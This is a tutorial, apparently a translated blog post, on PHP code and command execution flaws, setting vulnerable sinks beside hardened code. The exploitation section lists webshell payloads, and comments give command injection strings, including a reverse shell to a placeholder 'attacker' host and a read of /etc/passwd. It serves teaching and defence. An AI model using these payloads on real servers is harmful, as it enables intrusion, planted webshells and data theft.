Overview of Command Execution Vulnerabilities

command execution definition

  • Basic definition: A command execution vulnerability lets an attacker run code or commands of their choosing on the server. This article splits it into remote code execution (the attacker's string is evaluated as PHP code) and system command execution (the attacker's string is passed to the operating system shell).
  • Principle: Applications sometimes need to call functions that run system commands, such as system, exec, shell_exec, passthru, popen and proc_open in PHP. When users control the arguments of these functions, malicious commands can be spliced into the intended command, producing a command execution attack.

command execution condition

  • User input reaches the function's argument (the attacker controls the string)
  • The code calls a dangerous function that evaluates code or executes system commands

Cause of command execution

  • The developer passed input to a code- or command-executing function without validating or filtering it, so a client can submit a maliciously constructed string that the server then executes.
  • In other words, the application places no constraint on what reaches functions such as system(), eval() and exec(); that missing check in the application code, not anything in the web server, is why the attack succeeds.

The Harm of Command Execution Vulnerabilities

  • Execute system commands (or arbitrary code) and read or write files with the privileges of the web server process
  • Obtain a reverse shell
  • Take control of the whole website or even the whole server
  • Pivot further into the internal network

Remote Command Execution Vulnerability Related Functions

assert()

Description: Checks whether an assertion is false
assert(mixed $assertion, Throwable $exception = ?): bool
Traditional assertion (PHP 5 and 7)
If assertion is a string, assert() evaluates it as PHP code. If a boolean condition is passed as the assertion, the condition is not passed on as a parameter to the assertion handler; when the handler you registered with assert_options() is called, the condition is converted to a string, and the boolean value false becomes an empty string.
Assertions should only be used for debugging: as sanity checks that test a condition that should always be true, to flag a program error, or to check that a specific feature is available (an extension function, or a particular system limit or capability).
Simply put, when assert() is given a string, the string is treated as PHP code. Evaluating string assertions was deprecated in PHP 7.2 and removed in PHP 8.0, where a string argument is just a truthy value, so this sink only exists on PHP 5 and 7.

preg_replace()

preg_replace — Perform a regular expression search and replace

preg_replace(
    string|array $pattern,
    string|array $replacement,
    string|array $subject,
    int $limit = -1,
    int &$count = null
): string|array|null

Search for the part matching pattern in subject and replace it with replacement.
preg_replace(mixed $pattern, mixed $replacement, mixed $subject [, int $limit = -1 [, int &$count]]): mixed, where pattern is the pattern to search for (a string or an array of strings). When the pattern carries the /e modifier, the replacement value is executed as PHP code. The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0; on PHP 7 and later it produces a warning and preg_replace() returns null instead of executing anything.
Now the specific usage of this function:
Simplified model: preg_replace('/O/', 'A', 'HELLOWORLD') replaces each O in the third parameter with A.
In the first parameter, "." matches any character and "*" means any number of repetitions, so ".*" matches any string.
It is the added /e that causes the second parameter to be executed as PHP code at that point.
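The following is an added example, not code from the original post: the /e sink as it appears in vulnerable code, the request that abuses it, and the preg_replace_callback() form that replaces it. The function names and the request parameter names are assumptions for illustration.

```php
<?php
// Added example (not from the original post). Demonstrates the /e sink and
// its replacement. Function and parameter names here are illustrative.

// VULNERABLE on PHP 5.x (/e was deprecated in 5.5 and removed in 7.0).
// If an attacker controls the pattern, a request such as
//   ?pattern=/.*/e&replacement=phpinfo()&subject=x
// makes preg_replace() evaluate "phpinfo()" as PHP code for every match.
// Even when only the replacement is user-controlled, a hard-coded /e
// pattern is enough: the replacement string *is* the code that runs.
function vulnerable_replace(string $pattern, string $replacement, string $subject): ?string
{
    return preg_replace($pattern, $replacement, $subject);
}

// On PHP >= 7.0 the same call executes nothing: preg_replace() warns that
// the /e modifier is no longer supported and returns null.

// HARDENED: the code that computes the replacement is a fixed closure, and
// request data only ever appears as the subject (plain data).
function safe_replace(string $subject): string
{
    $out = preg_replace_callback(
        '/\w+/',
        static function (array $m): string {
            // The typical job once done with "strtoupper('\\0')" under /e.
            return strtoupper($m[0]);
        },
        $subject
    );
    return $out ?? $subject;
}

// If the search term itself must come from the request, quote it so it is
// matched literally: preg_quote() escapes regex metacharacters and the
// delimiter, so the attacker cannot close the pattern and append modifiers.
function literal_replace(string $needle, string $replacement, string $subject): string
{
    $pattern = '/' . preg_quote($needle, '/') . '/';
    return preg_replace($pattern, $replacement, $subject) ?? $subject;
}

echo safe_replace('hello world'), PHP_EOL;
echo literal_replace('.*/e', 'X', 'a.*/eb'), PHP_EOL;
```

The second echo passes a string that looks like a pattern with a modifier; because it is quoted with preg_quote() it is only ever matched as literal text, which is the property you want whenever a search term comes from a request.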

call_user_func()

call_user_func — Call the callback given by the first parameter
call_user_func(callable $callback, mixed ...$args): mixed
Calls callback with the remaining parameters as its arguments. As with the variable function below, if the callback name comes from the request, the attacker chooses which function runs.

$a($b) variable function

<?php
if (isset($_GET['a']) && isset($_GET['b'])) {
    @$a = $_GET['a'];
    @$b = $_GET['b'];
    @$a($b);  // variable function: the value of $a is used as the function name
    // $a is the function name
    // $b is the function's argument
    // ?a=assert&b=phpinfo()
    // becomes assert("phpinfo()"), which evaluates the string as PHP code (PHP 5 and 7)
} else {
    echo "Please input a&b";
}
?>

That is, the first parameter is used as the function name and the second parameter as the argument of that function.
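The following is an added example, not code from the original post: the post's $a($b) pattern beside a dispatcher that keeps the "choose a function by name" feature without letting the request name arbitrary PHP functions. The allow-list contents and the helper names are assumptions.

```php
<?php
// Added example (not from the original post). The post's $a($b) pattern next
// to a dispatcher that keeps "choose a function by name" without letting the
// request name arbitrary PHP functions. The allow-list is an assumption.

// VULNERABLE: the request supplies the function name itself.
//   ?a=assert&b=phpinfo()          assert() evaluates the string (PHP 5 and 7)
//   ?a=system&b=id                 runs a shell command
//   ?a=passthru&b=cat /etc/passwd  streams the file back
// eval is a language construct, not a function, so ?a=eval fails; that is
// why assert is the usual choice when only one string argument is available.
function vulnerable_dispatch(string $a, string $b)
{
    return $a($b);
}

// STILL VULNERABLE: existence checks do not separate safe from dangerous.
// function_exists('system') and is_callable('assert') are both true.
function still_vulnerable_dispatch(string $a, string $b)
{
    if (!function_exists($a)) {
        throw new InvalidArgumentException("no such function: {$a}");
    }
    return $a($b);
}

// HARDENED: the request carries an opaque key; the code owns the callable.
const ALLOWED_ACTIONS = [
    'upper' => 'strtoupper',
    'lower' => 'strtolower',
    'hash'  => 'sha256_hex',
];

function sha256_hex(string $s): string
{
    return hash('sha256', $s);
}

function safe_dispatch(string $action, string $arg): string
{
    if (!array_key_exists($action, ALLOWED_ACTIONS)) {
        throw new InvalidArgumentException("unknown action: {$action}");
    }
    // Fixed callable; attacker-controlled data reaches only the argument.
    return call_user_func(ALLOWED_ACTIONS[$action], $arg);
}

echo safe_dispatch('upper', 'hello'), PHP_EOL;
echo safe_dispatch('hash', 'hello'), PHP_EOL;
```

The point of the middle function is that "does this function exist" is the wrong question; the dispatcher must decide which functions are reachable, and the request must never carry a PHP identifier at all.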

Exploitation of Remote Command Execution Vulnerabilities

Against a page that evaluates parameter a as PHP code (with the $a($b) page above, set a=assert and put the same payload in b):

?a=@eval($_POST[1]);                         one-sentence trojan (webshell)
?a=print(__FILE__);                          print the absolute path of the current script
?a=file_put_contents($_POST[1],$_POST[2]);   with the POST body 1=shell.php&2=<?php phpinfo()?> this writes a shell file

The distinction: in remote code execution, the string we supply is PHP code; in system command execution, the string we supply is a shell command that the operating system executes.


System Command Execution Vulnerability Related Functions

  • system()
  • exec()
  • shell_exec()
  • passthru()
  • popen()
  • proc_open() and the backtick operator (`command`), which behaves like shell_exec()

system()

system(string $command, int &$result_code = null): string|false
Executes command and writes its output straight into the response, returning the last line of that output (or false on failure). If result_code is supplied, the command's exit status is stored in it.
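The following is an added example, not code from the original post: a ping helper that concatenates user input into system(), the injection payloads it accepts, and two hardened versions. The ip parameter, the ping -c 1 command line and the function names are assumptions for illustration.

```php
<?php
// Added example (not from the original post): a ping helper as it is often
// written, the injection it allows, and two hardened versions.
// The ?ip= parameter and the ping command line are assumptions.

// VULNERABLE: user data is concatenated into a shell command line.
//   ?ip=127.0.0.1;id                runs "ping -c 1 127.0.0.1;id"
//   ?ip=127.0.0.1`id`               command substitution inside the line
//   ?ip=127.0.0.1|nc attacker 4444 -e /bin/sh   reverse shell where nc -e exists
function ping_vulnerable(string $ip): void
{
    system("ping -c 1 " . $ip);
}

// HARDENED 1: validate the value against what it must be, then quote it.
// escapeshellarg() wraps the value in single quotes and escapes embedded
// quotes, so shell metacharacters (; | & ` $) are passed as plain text.
function ping_safe(string $ip): ?string
{
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return null; // reject rather than try to "clean" the input
    }
    $out = shell_exec('ping -c 1 ' . escapeshellarg($ip));
    return $out === false ? null : $out;
}

// HARDENED 2 (PHP >= 7.4): avoid the shell entirely. When proc_open() is
// given an array, it executes the program directly with that argv, so there
// is no command line for metacharacters to act on. Validation still matters:
// a value beginning with "-" would otherwise become an extra ping option.
function ping_noshell(string $ip): ?string
{
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['ping', '-c', '1', $ip], $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

echo ping_safe('127.0.0.1'), PHP_EOL;
var_dump(ping_safe('127.0.0.1;id'));   // rejected by validation: NULL
```

Validation and quoting do different jobs: FILTER_VALIDATE_IP rejects anything that is not an address, and escapeshellarg() guarantees that whatever does get through is a single shell word. Keep both; quoting alone still lets a value such as -c 1000 be parsed as an option by the program if the shell is bypassed.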

exec()

(PHP 4, PHP 5, PHP 7, PHP 8)

exec — Execute an external program

Description :
exec(string $command, array &$output = null, int &$result_code = null): string|false
exec() executes the given command and returns the last line of its output. If output is given, every line of the command's output is appended to that array; if result_code is given, the command's exit status is stored in it. Nothing is printed unless the script echoes it.

shell_exec()

Description:
shell_exec(string $command): string|false|null
The parameter is the command to be executed. Unlike exec(), shell_exec() returns the complete output as one string (null when there is no output or an error occurred).

passthru()

passthru(string $command [, int &$return_var]): void

Similar to exec(), passthru() also executes an external command. Use it instead of exec() or system() when the Unix command outputs binary data that should be passed straight to the browser. It is often used to run commands that emit an image stream directly, such as the pbmplus tools: set the Content-type to image/gif, then call the pbmplus program that outputs the GIF, and the image is sent from the PHP script to the browser as-is.
Parameters:
command: The command to execute.
return_var: If the return_var parameter is provided, the return status of the Unix command will be recorded to this parameter.

popen()

popen ( string $command , string $mode ) : resource
Opens a pipe to the process spawned by executing the given command.
Parameters
command: the command to run.
mode: 'r' to read the process's output, 'w' to write to its standard input. The returned pipe is used with the ordinary file functions and closed with pclose().

<?php
if (isset($_GET['a'])) {
    // Run whoami and append its output to 1.txt next to the script.
    // Nothing is sent to the browser; the result is read from the file afterwards.
    pclose(popen("whoami >>1.txt", 'r'));
} else {
    echo "Please input a";
}
?>

Note the greater-than signs in the command:
">" overwrites the file
">>" appends to the file


Origin blog.csdn.net/ssslq/article/details/130228672